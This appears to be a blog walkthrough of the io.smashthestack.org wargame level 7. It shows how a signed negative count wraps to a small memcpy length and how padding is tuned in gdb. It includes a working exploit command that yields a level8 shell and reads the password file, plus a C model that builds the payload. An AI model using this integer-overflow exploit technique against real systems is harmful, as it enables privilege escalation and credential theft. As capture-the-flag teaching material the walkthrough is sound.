Monday, June 24, 2013

IO Level 7

Level 7 from io.smashthestack.org:

count is a signed int, so a negative value can be passed in and gets past the size check, which only rejects counts that are too large. In count * sizeof(int) the negative count is converted to size_t (unsigned), multiplied by 4, and on this 32-bit box the product is truncated modulo 2^32, so a suitably chosen large negative count produces a small positive length for the memcpy(). For example, -1073741815 is 0xc0000009 as an unsigned 32-bit value; times 4 that is 0x300000024, which truncates to 0x24 = 36 bytes. Here are some debugging printfs added to a local copy of the level (in /tmp/ds7) to help visualize how many bytes memcpy() actually copies:


level7@io:/tmp/ds7$ ./level07 -1073741815 blah
count: -1073741815 (0xc0000009) 3221225481
count * sizeof(int): 36 (0x00000024) 36
Not today son

Brute-force the offset a bit until the overwrite lands on count. The copy runs past the buffer and up the stack, and the goal is to replace count's own stack slot, since the value checked after the memcpy() is count itself; "BBBB" shows up in count once the length and padding line up:

(gdb) run -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/ds7/level07 -1073741813 `perl -e 'print "A" x 40 . "BBBB"'`
count: -1073741813 (0xc000000b) 3221225483
count * sizeof(int): 44 (0x0000002c) 44

Breakpoint 1, main (argc=3, argv=0xbffffd64) at level07.c:23
23              if(count == 0x574f4c46) {
(gdb) x/x &count
0xbffffcac:     0x42424242

Adjust the offsets for the production binary. /levels/level07 is compiled without the debug printfs and has a different frame layout, so count sits 60 bytes past the start of the buffer rather than 40; a 64-byte copy needs count = 0xc0000010 = -1073741808, and the last four bytes are 0x574f4c46 ("FLOW") written in little-endian order:

(gdb) run -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`

Breakpoint 1, 0x08048467 in main ()
(gdb) x/x $ebp - 0xc
0xbffffc9c:     0x574f4c46

level7@io:/tmp/ds7$ /levels/level07 -1073741808 `perl -e 'print "A" x 60 . "\x46\x4c\x4f\x57"'`
WIN!
sh-4.2$ id
uid=1007(level7) gid=1007(level7) euid=1008(level8) groups=1008(level8),1007(level7),1029(nosu)
sh-4.2$ cat /home/level8/.pass
shhh don't snitch
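To tie the arithmetic and the overwrite together, here is an added C example (not part of the original write-up or of the level's source) that models the 32-bit length computation, derives the count that yields a given number of copied bytes, builds the argv[2] payload, and runs it against a mock stack frame in which count sits a configurable number of bytes above the buffer. The mock frame, its 128-byte size and the `count >= 10` guard are assumptions standing in for the level's real stack layout and size check, which the page does not reproduce; the offsets 40 (debug copy) and 60 (/levels/level07) come from the gdb sessions above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAGIC 0x574f4c46u   /* "FLOW" read as a little-endian int; the value count must equal */

/* 32-bit model of `count * sizeof(int)` as the level evaluates it: count
 * (int) converts to size_t (32-bit unsigned on the io box), is multiplied
 * by 4, and the product is kept modulo 2^32. uint32_t arithmetic wraps the
 * same way, so this involves no undefined signed overflow. */
uint32_t memcpy_len_32(int32_t count) {
    return (uint32_t)count * 4u;
}

/* Pick a negative count whose wrapped product is exactly nbytes (nbytes must
 * be a multiple of 4). 0xC0000000 * 4 = 0x300000000 == 0 (mod 2^32), so
 * adding nbytes/4 gives a count that is negative as an int yet copies nbytes. */
int32_t count_for_bytes(uint32_t nbytes) {
    return (int32_t)(0xC0000000u + nbytes / 4u);
}

/* Build argv[2]: `pad` filler bytes followed by MAGIC in little-endian byte
 * order (the perl one-liners in the write-up do the same by hand).
 * Returns the payload length, or 0 if it does not fit. */
size_t build_payload(uint8_t *out, size_t cap, size_t pad) {
    if (pad + 4 > cap) return 0;
    memset(out, 'A', pad);
    for (int i = 0; i < 4; i++)
        out[pad + i] = (uint8_t)(MAGIC >> (8 * i));
    return pad + 4;
}

/* Assumed model of the level's frame: the buffer at offset 0 and count
 * `count_off` bytes above it. The real offset is a property of each compiled
 * binary (40 in the debug build, 60 in /levels/level07 per gdb); here it is a
 * parameter. Returns 1 for "WIN!", 0 for "Not today son", -1 when the copy
 * would leave the modelled frame (the real binary would simply crash). */
int run_level_model(int32_t count, const uint8_t *arg, size_t arglen,
                    size_t count_off) {
    uint8_t frame[128] = {0};
    if (count_off + 4 > sizeof frame) return -1;
    memcpy(frame + count_off, &count, 4);   /* count lives on the stack too */

    if (count >= 10) return 0;              /* assumed stand-in for the level's size check */

    uint32_t len = memcpy_len_32(count);
    if (len > sizeof frame || len > arglen) return -1;
    memcpy(frame, arg, len);                /* the overflow: runs past the buffer */

    memcpy(&count, frame + count_off, 4);   /* re-read the (possibly clobbered) count */
    return count == (int32_t)MAGIC ? 1 : 0;
}

/* Build a payload with `pad` filler bytes, derive the matching negative count,
 * and run it against a frame whose count slot is `count_off` bytes up. */
int demo(size_t pad, size_t count_off) {
    uint8_t payload[128];
    size_t n = build_payload(payload, sizeof payload, pad);
    if (n == 0) return -1;
    return run_level_model(count_for_bytes((uint32_t)n), payload, n, count_off);
}

int main(void) {
    int32_t count = count_for_bytes(64);   /* 60 'A' + "FLOW" = 64 bytes, as used against /levels/level07 */
    printf("count=%d (0x%08x) copies %u bytes -> %s\n", count, (uint32_t)count,
           memcpy_len_32(count), demo(60, 60) == 1 ? "WIN!" : "Not today son");
    return 0;
}
```

The interesting cases are the mismatches: demo(40, 60) copies only 44 bytes and never reaches count, while demo(60, 40) overshoots and leaves 0x41414141 in count, which is exactly why the write-up had to re-tune the padding when moving from the debug copy to the production binary.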
